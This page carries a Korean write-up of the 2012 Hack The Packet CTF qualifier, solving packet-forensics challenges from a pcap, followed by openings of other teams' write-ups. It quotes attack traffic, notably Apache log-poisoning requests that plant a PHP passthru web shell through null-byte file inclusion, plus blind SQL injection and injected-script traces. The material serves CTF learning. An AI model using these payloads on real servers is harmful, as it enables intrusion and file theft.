2012 Hack The Packet Online PreQUAL Write-up

Size: px
Start display at page:

Download "2012 Hack The Packet Online PreQUAL Write-up"

Transcription

1 # Hack The Packet Online PreQUAL Write-up 2012 HTP 온라인예선문제풀이 Abstract 2012년 10월 26일 ( 금 ) PM 19:00 ~ 10월 27일 ( 토 ) AM 01:00까지 6시간동안 HTP@POC2012 by Rainbow에서진행한 Hack The Packet Online PreQUAL ( 예선 ) [Low] 난이도의 L01, L02, L1~L5 문제, [Middle] 난이도의 M1~M5 문제와 [High] 난이도의 H1~H5 문제에대한 Write-up 입니다. 하행운 [RExVuz] rexvuz@gmail.com

2 목차 1. [Low] 난이도 ) L ) L ) L ) L ) L ) L ) L [Middle] 난이도 ) M ) M ) M ) M ) M [High] 난이도 ) H ) H ) H ) H4 ( 공개된풀이 ) ) H Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 2

3 1. [Low] 난이도 1-1) L01 <Q> 2012_htp_prequal.pcap 파일은어떤환경 (System Information) 에서캡쳐한것일까? <EQ> Which System be used when this 2012_htp_prequal.pcap file captured? BinText 를이용하여 pcap 파일내의문자열들을보니시스템환경 (System Information) 에관련된정보가나와있었 다 C C 0 64-bit Windows 7 Service Pack 1, build D D bit Windows 7 Service Pack 1, build bit Windows 7 Service Pack 1, build 7601 Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 3

4 1-2) L02 <Q> 2012_htp_prequal.pcap 파일은어떤도구로캡쳐한것일까? ( 대문자로입력 ) <EQ> What tools be used in capturing this 2012_htp_prequal.pcap file? (Upper case) L01 번문제와마찬가지로 BinText 를이용하여 pcap 파일내의문자열들을보니 Dumpcap 이라는도구 (tool) 로추측되는문자열이있었다. 문제지문에 ( 대문자로입력 ) 을보고 DUMPCAP 으로인증을시도했지만 되지않았다. 여러방법으로인증을시도해보다계속된실패에 HackThePacket 님 (?) 께 Facebook 메시지로위와같이질문해보고 DUMPCAP 으로인증을시도해보았지만되지않았다. 혹시나이도구가아닌가하는생각에 Google에 dumpcap 을검색한결과 dumpcap - The Wireshark Network Analyzer 이라는단서를찾았다. 그순간아차 (!) 하고뒤늦게 Wireshark라는것을깨닫고인증하였다. WIRESHARK Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 4

5 2-1) L1 <Q> ARP_Spoofing에의해서나의아이디와패스워드가유출됬다! <EQ> ID and Password of mine were leaked by ARP Spoofing! ** key is AttackerMacaddress_VictimPassword pcap 문제파일을 Wireshark 로열어보면 ARP(Address Resolution Protocol) packet 이초반부터보인다. [ Sender MAC address: Vmware_f3:21:ad (00:0c:29:f3:21:ad) ] packet 을살펴보면인증키형식의일부에해당하는 AttackerMacaddress 가보인다. 공격자의 MAC address 는 00:0c:29:f3:21:ad 이다. Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 5

6 다음으로유출된아이디와패스워드를찾아보겠다. tcp.stream eq 8 Filter 를이용해서 [Follow TCP Stream] 으로 stream 을보면아래와같다. POST login.php?login_attempt=1 HTTP1.1 Accept: imagegif, imagex-xbitmap, imagejpeg, imagepjpeg, applicationx-shockwave-flash, ** Referer: Accept-Language: ko Content-Type: applicationx-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache Cookie: datr=v6estntuznxki-cfhj4rxqaa; reg_fb_gate=http%3a%2f%2fwww.facebook.com%2f; reg_fb_ref=http%3a%2f%2fwww.facebook.com%2f; wd=691x357 charset_test=%e2%82%ac%2c%c2%b4%2c%e2%82%ac%2c%c2%b4%2c%e6%b0%b4%2c%d0%94%2c%d0%84 &lsd=ppm9h&locale=ko_kr& =hi_gal@gmail.com&pass=yong_gal&default_persistent=0&charset_test= %E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=PPm9h 페이지에 POST 방식으로요청하는 packet 이다. Facebook 에 =hi_gal@gmail.com&pass=yong_gal 으로로그인을시도한데이터들이 ARP Spoofing 공격에의해서유 출된것이다. 00:0c:29:f3:21:ad_YONG_GAL Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 6

7 2-2) L2 <Q> 남자들이뼛속까지좋아하는여자는누구? DNA 연구결과가발표되었다. 바코드를찾아라! <EQ> Who s the girl loved of man s bones? It s released the result of DNA. Find the Barcode! [File] [Export Objects] [HTTP] 를이용해서파일내의 object 들을모두추출한다. 그중 HTML 페이지가추출되 었는데, 추출된 HTML 페이지를열어보았다. 페이지에 2D 바코드가있었다. 해당바코드를 에서 Decoding 한다. Key:IU Good 역시 IU 는짱이죠! IU Good Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 7

8 2-3) L3 <Q> 화창한봄날 G 마켓에코드가삽입됐다. <EQ> Spring, A code injected in G-market. 문제지문을보면 Spring ( 봄날 ) 이핵심인데추출된 object 중 GMainSpring.js 이라는파일명이가장단서가될 만한것같았다. 해당파일의내용을살펴보면맨위에있는 getflashplayerhtml 이라는함수가가장수상하였다. function getflashplayerhtml(strsrc, strmovie, strwidth, strheight, idname ){ var shtml; shtml = ""; shtml = shtml + " <OBJECT id='" + idname + "' name='" + idname + "' codebase=' "; shtml = shtml + " width='"+strwidth+"' height='"+strheight+"' classid='clsid:d27cdb6e-ae6d-11cf- 96B '> "; shtml = shtml + " <PARAM NAME='FlashVars' VALUE=''> "; shtml = shtml + " <PARAM NAME='Movie' VALUE='"+strMovie+"'> "; shtml = shtml + " <PARAM NAME='WMode' VALUE='transparent'> "; shtml = shtml + " <PARAM NAME='Quality' VALUE='High'> "; shtml = shtml + " <PARAM NAME='Menu' VALUE='-1'> "; shtml = shtml + " <PARAM NAME='Base' VALUE=''> "; shtml = shtml + " <PARAM NAME='AllowScriptAccess' VALUE='always'> "; shtml = shtml + " <PARAM NAME='Scale' VALUE='ShowAll'> "; shtml = shtml + " <PARAM NAME='DeviceFont' VALUE='0'> "; shtml = shtml + " <PARAM NAME='EmbedMovie' VALUE='0'> "; shtml = shtml + " <PARAM NAME='SeamlessTabbing' VALUE='1'> "; shtml = shtml + " <PARAM NAME+'base64 hash : #@~^dq4aaa==md~ky9{ddbuo,'~[[%fila%li[[f!zi'aw%p[:,0ila{fp'arvi'[%ci'[%qil:rcila8!%p[[{cp[:%2i':ffil:%yi[[qq*p[[%{i':+%i[[{cp[: {8i[:qZFI[[0+i'[F8 ilar{ila{,p[:0wi[[ vp[a8t*ilar I[:*Oi'aOTiLaqTOi[:0Fi'a8TOi'[*2i[[%FI[[G{iLa{qp[aR+iLa%OI'aR&p[:FT1p[:F81iLa qp[a0fp[:%lilaqz!p[aw%p'ao%i[[gqil a%+i[[%cp':%8ila0ci'[ft%p'afci'[%&i'[gqil:r ILa8F*p[[0Gp[:vRi':FciL:G8i[[qTFp[[% i':8f+il:%fi':f,i':rci[[ +i'[fzcilar+ila*,p[:1zi[[q!oi[[0{ila8!1i':l&i[[0gp[:{fi[:{8i'ar+ p[:r,p[ar&p'a8!1ilaqqoi[[ Fp[aRfI[[%li'aqTZi'aW0iLa10p[a{qp[:%+ILa0WiLa%8iL:%Wi'a8!0ILaGWI[[%&p':G8iLa0 I'[Fq*p'aRGI'[v%I'[G*iL:FFILa8!Fp[[0vp[:F8 I'[%Gp'aF,iL:0cp[[v i':8!*il:%yi':w,i':o!i[[qz,ilargila8t,p[:*2i':rgil:gfi[[{qilar I[:0Oi'aRfiLaqTOi[:q8,I[[ 8i'[%2i[[%lI[[FT!p[:*Ri[[1%p[aFqI[[%+i'a0*p[:%8I[[%*ILaFT0p[:GWILa02iLaG8iL:%yi'a8FXILa%FI[ [v%p':gwila{fi'[ftfp'arvi'[ff+ila0gp'[g1p[[%cp[[ vp[:fzci'[% p'aw,il:1!p[[ft,i'[%{il:fz,i'[*&i'[%{il:fgilaffilar+ila0,p[:02i[[q!oi[[qq,p[[vqi':r&i[[0*p[:qz!i':w%i[[1ri'[g8i[[%+i[[%*ila 0qp[aR*iLaFZ0I[[GWi'a0fp[:G8I[[%+ILaFqXp[:%FILa RiLaGWiL:G8i'a8!qILa%+I[[FFyI'aRGp[:G1ILa0cp'a+vI'[F!*ILa0 Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 8

9 p'[c1p[[,!p[[q!oi'argi'[f!oi[[*&p':%fila{gi'[gqil:%yi':r,i':r&i[[qz,ila8f,p[[ Fp[:%2i':R*iL:FZ!iL:*%p[[,0i':FFI[[0vp[:0Wi[:08i 'ar*p[:8!ri[[gwi[[%fila{qp[ar+ilaf8xi[[%fi'a 0p[:GWI[[GqILaFTqp[:%+ILaq8 p[argp'af,i[[%*ilav+i[[f!wi'ar p[:c1ila1!p'a8!1ila%{ilaq!oilax2ila%fil:gfi'affi'[% p'ar,il:0&p[[ft,i'[fq,p'a+fi'[%&i'[%xil:8!tp[[c%p[[1%p[:g8i':rvil:%wi[[0qilarci[:qz%i[[{cp[:02i[:{8i'ar+p[:8fli[[%fi[[v0i La{*p[aFqiLaFZqI[[%+i'aqqyi'aR{iLa{1p[a0*p[:v+ILaqZcp[aR p'aw,i[[,tilafz1ila%fi'a8!oi'axfp[:%fi[[g{ilagqila0 p'[%1p[[%&p[[q!oi'a8f1ilav8i[[%&p':%lilaq!tila*%p'ao%i'[gfi'[% il:rcilarfilar*ilaq!ri':fcil:%2i[[{qilar I[:q8*I[[0Gp[: Ri[:{Wi'aFqp[:8!8i[[%+I[[Fq p[:0fi[[{,p[ar*i[[v+i'aqtwi'ar+ila*1p[a1tp[:fz1p[:rgp[a8!oi[[*fila0{p[af{ilag8i'ar p[:%1ila0&p'a8!1ilafq1p[:v8ila02ila%lil:fz!i[[c0ila,ri[[gfp':%+ila0ci'[%qil:%wi':8!%i'[g*il:r&ilaffilar+ilaqfli':rgi L:vRi[[{*iLaFFI[:qZFI[[0vp[:q8 i':rgi[[{oi'[%wi[[v+i[[ftcp[:0yi[[*,p[aoti[[fz,i[:0fi'a8t,p[:x2i[:0fi'af{p[:ffp[ar p'ar,i[[%filafz1ilaf81i[[v8i'a0fp[:%li[[fttp[a*0p[:,rila{8ila%+il:%wi'arfi'[%cp'a8!%p':gwila0&i'[gqil:%yi':8f*i'[%{il :+%ILaFciLaFqiLaq!8i':RviL:F8 il:0gp[[g1i':rci[[ vp[:qzci':r I[[*Oi'[,Zi[[FZ1iLa0Gp[:qZ,iL:*2i[[0{iLaFGI[:{8i'aR+iLa01p[a0fp[:FZ1p[:8FOi[[v8I[[%fiLa0Xp[a8T!p[aW0I[[,Ri'a{qp[:%+I[[%*I La%qILa0cp'[FTRiLaGWiL:%2i'aFFI'[% p'a8f*p':%fila %I'[G*iL:G8i':8!FI'[% il:8f+p[[%gp[[{,p[:%wi':+vil:fzcil:0 p[[c1i':o!i[[q!oi':rgi':8!1il:l&ilargilaf{ila{fp[:0yi[[0,p[arfi[[fz,i[:q8,i[[ Fp[:02i[:0li'a8TZi'[cRi[[,RI[[GqiLa0 p[ar*ila%8i'a Rcp[:FT0p[:GWI[[%fILaGqILa0 p'[fqlila%fil:vri'afci'[gfp'a8!fp':%+ilaqf+ila0gp'af,i'[%ci'[v il:8!*p[[% p[[*,p[:,zi':8!,p'argil:q!oilax&i'[%{il:gfi':ffi':r I[[0Oi'[%2i[[FZ1iLaqFOi':+FiL:%2i[[0XiLa8!Ti':W%I[[1%p[:{8i[:0+i'aR*p[:RFp[aRcp'a8!0iLa{*p[aRfiLaG8I'aR p[:fqxp[:%fi[[v0ilag*ila{fp'[ft8ila%+il:f8 I[[%{ILaGOI[[%cp':v+iLaq!*ILa0 p'aw,i'[,!i'[ft,p'[%{p[[f!oil:*2i'argi'[ggp'affil:0 p[[%1i':r&i[[q!oi':8f,i'[vqil:r&ilar*ila8t!p[:cri':o%il:g8i[[0 ilarci[:08i'ar*ilaqtri[:{wi'arfp[:ffp[ar p'a8fxila0{p[a+0ilagwi'affp[:ftqp[:%+i[[fq+p[a0{p[:goila0wilav+il:fzci[[%+ilacoi[[,!p':fz,p[:%{ilaq!oi[[*fila%{il a{gp'[gqp[[% p[[0,p[:%2i':8!,p'a8f,p':v8ila0&i'[%xil:fz!i'[c%i'[,0il:ffilarvilar*ila0fp[:0wi[[q!ri[[{*ilar&i[:{8i'ar+ilaqqli[:0fi'a+0p[:f cp[affp'a8!qila0 p[a8q p[ar{i[[goi'a0*p[:v+i[[ft*p[a0+p[:coila1zilafz,p'argi[[ft1p[alfila%fi'afgp[:gqila0 p'ar,i'[%&i'[ft,p'[fqoilav8il:%2i'ar*i'[f!zi[[c%p':,rila{fi'[% il:%wi':rfi':rci[[qz%ilafcilarfila{fp[:0yi[[qfli[[0{ila+%i[: {Wi'aFqiLaqT8i[:0+i'a8qyi'[%Fi[[GOI[[%*iLa p[a8tcp[ar+i[[coi'a1tp[:fz1ila0{p[aqtoi'alfp[:rgp[afgp'affi[[%+ila%oi ; shtml = shtml + " <embed src= '"+strsrc+"' quality=high wmode='transparent' "; shtml = shtml + " pluginspage=' "; shtml = shtml + " type='applicationx-shockwave-flash' width='"+strwidth+"' height='"+strheight+"' allowscriptaccess='always'> "; shtml = shtml + " <embed> "; shtml = shtml + " <OBJECT>"; } return shtml; 함수내의내용을보면 <PARAM NAME+'base64 hash : ~~~ > 부분에 Encoding 되어있는값이가장수상했다. 그런데해당문자열이어떤방식으로 Encoding 되어있는지몰라서풀지못하고힌트가나오기를기다렸다. Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 9

10 마침내힌트가나왔는데핵심은 VB Script 였다. 사이트에 getflashplayerhtml 함수를넣어주고 [Decode Content] 하니아래와같이 Decoding 되었다. <PARAM NAME+'base64 hash : var std_string = SUd0bGVTQTlJSGRsW&# 68;JGeVpWOTBhR1ZmWm&# 53;WMGRYSmw=SUd0bGVT& #81;TlJSGRsWDJGeVpWOT&# 66;hR1ZmWm5WMGRYSmw=&# 83;Ud0bGVTQTlJSGRsWD&#74 ;GeVpWOTBhR1ZmWm5W&#77 ;GRYSmw=SUd0bGVTQTl JSGRsWDJGeVpWOTBhR 1ZmWm5WMGRYSmw=SUd 0bGVTQTlJSGRsWDJGe& #86;pWOTBhR1ZmWm5WMGR&# 89;Smw=SUd0bGVTQTlJS&#7 1;RsWDJGeVpWOTBhR1Z&#10 9;Wm5WMGRYSmw=SUd0b&#71 ;VTQTlJSGRsWDJGeVpW OTBhR1ZmWm5WMGRYSm w=sud0bgvtqtljsgrs WDJGeVpWOTBhR1ZmWm 5WMGRYSmw=SUd0bGVT& #81;TlJSGRsWDJGeVpWOT&# 66;hR1ZmWm5WMGRYSmw=&# 83;Ud0bGVTQTlJSGRsWD&#74 ;GeVpWOTBhR1ZmWm5W&#77 ;GRYSmw=SUd0bGVTQTl JSGRsWDJGeVpWOTBhR 1ZmWm5WMGRYSmw=SUd 0bGVTQTlJSGRsWDJGe& #86;pWOTBhR1ZmWm5WMGR&# 89;Smw=SUd0bGVTQTlJS&#7 1;RsWDJGeVpWOTBhR1Z&#10 Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 10

11 9;Wm5WMGRYSmw=SUd0b&#71 ;VTQTlJSGRsWDJGeVpW OTBhR1ZmWm5WMGRYSm w=sud0bgvtqtljsgrs WDJGeVpWOTBhR1ZmWm 5WMGRYSmw=SUd0bGVT& #81;TlJSGRsWDJGeVpWOT&# 66;hR1ZmWm5WMGRYSmw= '> 위문자열은 HTML Entities 로이루어진값들인데, 중복되는부분이있었다. 데이터의초반에굵게표시한부분이 계속해서반복되는부분이었다. 굵게표시한값만따로뽑은후에, Python 을이용해서해당숫자값을문자로출력해보니 Base 64 Encoding 된 문자열이나왔다. IGtleSA9IHdlX2FyZV90aGVfZnV0dXJl Decoding 결과또다시위와같이 Base 64 Encoding 된문자열이나왔는데한번더 Decoding 하니 key = we_are_the_future we_are_the_future Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 11

12 2-4) L4 <Q> 우탱아, 가을인데단풍놀이가야지 ~ 어디로갈까? <EQ> Wootang, Let s go to see the maple leaves~ it s Autumn! where is it? 추출된 object 중에 Where_is_it.jpg 파일이위의이미지였는데, Google 이미지검색을이용해서검색해보았다. 위처럼 Hallasan 이라는결과가나왔다. 그런데이미지파일에대해서좀더상세히분석하기위해서 PhotoME 를 이용해서파일의 Exif 정보를보았다. JPG 파일의코멘트에진짜인증키가나와있었다. K@e*y_:_hallasan hallasan Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 12

13 2-5) L5 <Q> 악성다운로더 <EQ> Malware Downloader 다운로더이기때문에실행파일로추측하였고, 추출된 object 중에서 noexe.exe 라는수상한파일을포착하였다 C C 0 An$w3r is HTP_Forever@ C C 0 An$w3r is HTP_Forever@ BinText 를이용하여인증키로보이는문자열을뽑았지만완전한인증키가아니었다. tcp.stream eq 55 Filter 에있는 stream 을 [Follow TCP Stream] 으로보니 exe 파일이다. 신들린 eye-grep 으로완 전한인증키가있는부분을찾아내었다. An$w3r is HTP_Forever@^^@~~ HTP_Forever@^^@~~ Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 13

14 2. [Middle] 난이도 1) M1 <Q> 나는누구인가? 네오는오라클에게 FTP로 Zip 파일을받게되는데... <EQ> Who am I? Neo got a zip file from oracle via FTP... 문제지문을보고 Zip 파일을추출하면된다는것을파악하였다. HxD(Hex Editor) 로 pcap 문제파일을열고, Zip 파일 signature 중 header에해당하는 50 4B 를검색해보았다. 위의압축파일에 who_am_i.txt 라는파일이포함되어있는것을볼수있었다. 드래그한부분만따로잘라내어 Zip 파일로저장후압축을풀어보니 txt 텍스트파일이나왔다. txt 파일을열어보니 hex 값으로추측되는데이터가있었는데이를 HxD 에붙여넣고 Base 64 Encoding 된데이터 (SV9BTV9UcmFpbmVlX0Fobg==) 를 Decoding 하였다. I_AM_Trainee_Ahn Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 14

15 2) M2 <Q> DB이름을찾아라! <EQ> Find the name of DataBase HTTP objects 를살펴보던중 Blind SQL Injection 공격을시도했던흔적이보였다. helloindex.php?no=1 [ tcp.stream eq 91 ] <font size=20> WELCOME <font><font size=25><b> gal <b><font> helloindex.php?no=2 <font size=20> WELCOME <font><font size=25><b> POC <b><font> helloindex.php?no=3 <font size=20> WELCOME <font><font size=25><b> IU <b><font> 위의결과에서 index.php?no=3 일때 WELCOME IU 라는문자가출력되었다. [ tcp.stream eq 92 ~ tcp.stream eq 108 ] 위 stream 들을모두보면 substring 함수를이용해 Blind SQLi 공격을하여한문자씩읽어오는데성공하면 IU 라는문자열을보여준결과가차례대로 e a s y w e b s i t e a t t a c k 이므로이값이바로 DB 이름이된다. easywebsiteattack Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 15

16 3) M3 <Q> 라우터에백도어가삽입되어있다. 마지막으로실행된명령어는? <EQ> Backdoor injected in Router. what's the last command? tcp.stream eq 17 Filter 를이용하여 stream 을보았다. ( 뒤늦게인증한문제대부분은 tcp.stream eq 1 ~ 150 까지의모든 stream 을보고품 ) ( 중략 ) Cisco 라우터에관련된문제의인증키가나왔다. hostname An$w3r_is^tclsh Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 16

17 4) M4 <Q> 누군가가나의 Secret폴더의내용을읽었다! <EQ> Someone read a Secret folder of mine! ** Key is secret.txt_hiden.txt_pass.txt in Secret Folder ** hiden is not wrong. it s just typo Apache Log Injection 공격에관련된문제이다. C:\APM_Setup\htdocs\Secret :05 <DIR> :05 <DIR> :32 9 hiden.txt :32 6 key.txt :16 4,890 Pass.jpg :33 9 pass.txt :32 6 secret.txt tcp.stream eq 83 Filter 의 stream 을보면위와같이 Secret 폴더에 5 개의파일이존재하였다. 그중인증키에 필요한파일에대한정보는다음과같다. [ secret.txt : 6bytes hiden.txt : 9bytes pass.txt : 9bytes ] tcp.stream eq 85 index.php?cmd=cd%20secret%26type%20secret.txt&page=..serverapachelogsaccess.log%00<?passthru($_g ET['cmd']);?> index.php?cmd=dir&page=..serverapachelogsaccess.log%00noopen [ secret.txt NOOPEN 6bytes ] tcp.stream eq 87 index.php?cmd=cd%20secret%26type%20key.txt&page=..serverapachelogsaccess.log%00<?passthru($_get[ 'cmd']);?> index.php?cmd=dir&page=..serverapachelogsaccess.log%00iloveu [ key.txt ILOVEU 6bytes ] Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 17

18 tcp.stream eq 88 index.php?cmd=cd%20secret%26type%20hiden.txt&page=..serverapachelogsaccess.log%00<?passthru($_g ET['cmd']);?> index.php?cmd=dir&page=..serverapachelogsaccess.log%00apachelog [ hiden.txt APACHELOG 9bytes ] tcp.stream eq 89 index.php?cmd=cd%20secret%26type%20pass.txt&page=..serverapachelogsaccess.log%00<?passthru($_ge T['cmd']);?> index.php?cmd=dir&page=..serverapachelogsaccess.log%00injection [ pass.txt INJECTION 9bytes ] 인증키에포함되는 secret.txt hiden.txt pass.txt 파일의내용을모아보면 NOOPEN APACHELOG INJECTION 이된다. NOOPEN_APACHELOG_INJECTION Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 18

19 5) M5 <Q> 메일사용자계정과패스워드가 IRC 봇에감염되어유출됐다. <EQ> mail account and password leak by infected IRC bot. Key is password ( 중략 ) tcp.stream eq 20 Filter 를보면 shadowbot 을이용하여감염된것을확인할수있다. good_bye_jobs Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 19

20 3. [High] 난이도 1) H1 <Q> 이메일을통해 jitae 의첫번째데이트기밀정보를입수하는데... 하지만내용없이파일만첨부되어있었다. 데이트장소는언제몇시에어디인가? <EQ> SOMEONE GOT A SECRET INFORMATION OF jitae s FIRST DATE VIA . BUT THRER IS ONLY ONE ATTACHED FILE WITH NOTHING. WHEN AND WHERE? HTTP objects 를보면 DAUM 이메일에관련된 object 가있다 번 packet 의 object 는 HTML 페이지이고, 2096 번 packet 의 object 는 mp3 파일이다. ViewMail.daum 파일을열어보면내용없이 promise.mp3 파일만첨부되어있었다. 그리고추출한 object 중 mp3 파일을들어보니 개똥이네버블버블 (;;;) 이라는의도를파악할수없는소리만들렸다. GoldWave 를이용하여 Spectrum 을분석해보기도했는데수상한흔적을찾을수없었다. 그러던도중힌트가나왔다. 스테가노그래피 를보고 mp3 Steganography 임을파악하여, 예전부터잘알고있고 사용해봤던툴인 mp3stego 를이용하였다. [ Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 20

21 Decode.exe 를이용하여 Decoding 하는데 Steganography Key 가필요했다. Key 는문제지문에있는 jitae 일것 이라고생각하여이를이용하여 Decoding 하였다. 결과파일로 promise.mp3.txt 파일이추출되고텍스트파일의내용에데이트장소와시간이나와있었다. sunday, 14:00, GangNam station Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 21

22 2) H2 <Q> 수학을공부하던꼬비는잠이들었는데, 공식이다른이상한글자들로바뀌어있는꿈을꾸게되었다. <EQ> GGOBI went to sleep in studying math and had a dream that the function replaced with strange words. TCP stream 을살펴보면 FTP(File Transfer Protocol) 를이용하여 Math.part1.jpg, Math.part2.jpg, Math.part3.jpg 파 일로통신하는것을확인할수있었다. 해당파일들은각각아래의 Filter 를이용하여파일을추출할수있었다. [ tcp.stream eq 13 (Math.part1.jpg) tcp.stream eq 14 (Math.part2.jpg) tcp.stream eq 15 (Math.part3.jpg) ] 3 개의파일이추출되었는데해당 JPG 파일 trailer 부분에는 Rar! 로시작하는 RAR 압축파일의 header 가보였다. 총 3 개의 RAR 압축파일을추출하였고, part1, part2, part3 을보아분할압축파일로추측하였다. 압축을풀면총 6 개의한글파일 (hwp) 이추출된다. 6 개의파일중 cp 가붙은것은복사본으로생각하고무시하고, 공통수학정리.hwp 파일이끌려서열어보았다. Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 22

23 PoWeR eye-grep(!) 으로 4 페이지의오른쪽다단에있는키값을찾았다. <3y = (47( - _Y0ur_Dr34m 하지만인증이안되길래 Facebook 메시지를통해물어보니 Y0ur_Dr34m 만최종인증키라고하였다. Y0ur_Dr34m Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 23

24 3) H3 <Q> 우태혁의여자친구이름은무엇이고, 어디에살고있는가? <EQ> What is the name of Woo Tae Hyuck s girl firend, and where she is? (Key Format :: Woo Tae Hyuck_Hanla Mountain) tcp.stream eq 40 Filter 를보니 NetMeeting 으로통신한것같은흔적이남아있었다. Kim Ha-Neul 이라는여자 친구이름과, Dokdo_island 라는지명을찾았다. Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 24

25 대회진행당시에문제를풀때는여자친구이름만찾고독도를찾지못했는데 BinText 를이용하여우연히 Dokdo_island 를쉽게찾아서인증했었다. Kim Ha Neul_Dokdo island Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 25

26 4) H4 ( 공개된풀이 ) <Q> 무슨동물좋아하니? <EQ> What kind of animal do you like? download_file_ft.py%3fsignature= &time= &username=wootang87&fileid= &error_cb=http%3A%2.com HTTP objects 중에서위의파일명을가진파일을추출하고 signature 를보니 JPG 파일이었다. word.jpg 파일이었는데, 대회종료후 을통해풀이방법을알게되었다. 사실무작 위로 MAMMALS, SCORPION, DOG, SNAKE, ANUBIS 등을시도하고 HTP 의토끼캐릭터가생각나서 RABBIT 도시 도해보았지만 BUNNY 일줄은 T_T BUNNY Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 26

27 5) H5 <Q> 네이트온사진함께보기를통해, 우탱이는어떤수학문제를알게됐을까? <EQ> What does Wootang get a mathematical problem via the function of sharing the picture on NateOn? 정답은수학문제를푼값입니다. The answer is the right value solving the math. tcp.stream eq 75 Filter 를보니위의 stream 처럼 NateOn Protocol 을이용하여 JPG 파일이송수신된것을확인 할수있다. 추출한이미지를보니약간깨져있었다. eye-forensics SKILL 을발휘하였다. [What is the perimeter of the rectangular field? 둘레의길이를구하시오.] 두뇌풀가동 (!) 으로열심히둘레를구해본결과 (5+8+7)+(5+8+7) = Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 27

28 Copyright c 2012 RExVuz@SecurityFirst. All rights reserved. 28

Hack The Packet Online PreQUAL 이진혁 [ loca ]

Hack The Packet Online PreQUAL 이진혁 [ loca ] Hack The Packet Online PreQUAL 이진혁 [ loca ] loca@loca.kr L01 Q 2012_htp_prequal.pcap 파일은어떤환경 (System Information) 에서캡쳐한것일까? EQ Which System be used when this 2012_htp_prequal.pcap file captured? Hex Editor

More information

Hack the Packet 보고서 위 dj

Hack the Packet 보고서 위 dj Hack the Packet 보고서 2012.11.01 5 위 dj 목차 1. L01 ---------------------------------------------------- 3 2. L02 ------------------------------------------------------- 18 3. L1 ----------------------------------------------------

More information

2012 POC, Hack The Packet Online PreQUAL TEAM SsoMac by 최봉철 [ mikorea madkid ]

2012 POC, Hack The Packet Online PreQUAL TEAM SsoMac by 최봉철 [ mikorea madkid ] 2012 POC, Hack The Packet Online PreQUAL TEAM SsoMac by 최봉철 [ mikorea madkid ] mikorea@kangwon.ac.kr L01 Q 2012_htp_prequal.pcap 파일은어떤환경 (System Information) 에서캡쳐핚것일까? EQ Which System be used when this

More information

HACK THE PACKET 닉네임 이름 if 김형선 보고서는문제를풀면서접근했던방법및결과위주로작성하였습니다. 이모든영광을문제만드시느라고생하신 HackThePacket 운영진에게바칩니다.

HACK THE PACKET 닉네임 이름 if 김형선 보고서는문제를풀면서접근했던방법및결과위주로작성하였습니다. 이모든영광을문제만드시느라고생하신 HackThePacket 운영진에게바칩니다. HACK THE PACKET 닉네임 이름 if 김형선 보고서는문제를풀면서접근했던방법및결과위주로작성하였습니다. 이모든영광을문제만드시느라고생하신 HackThePacket 운영진에게바칩니다. L01 Q 2012_htp_prequal.pcap 파일은어떤환경 (System Information) 에서캡쳐한것일까? 제공된.pcap파일을헥사에디터로읽으면매직헤더뒤에. 특정

More information

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration

More information

1217 WebTrafMon II

1217 WebTrafMon II (1/28) (2/28) (10 Mbps ) Video, Audio. (3/28) 10 ~ 15 ( : telnet, ftp ),, (4/28) UDP/TCP (5/28) centralized environment packet header information analysis network traffic data, capture presentation network

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

Hackthepacket WriteUp ##DoubleB## LQ. telnet 은다보여 LEQ : telnet Hint : Key is telent Password FILE : 3.Q_2(Leopardan) Sol) Idea : 힌트에따라 TELNET 프로토콜을필터링

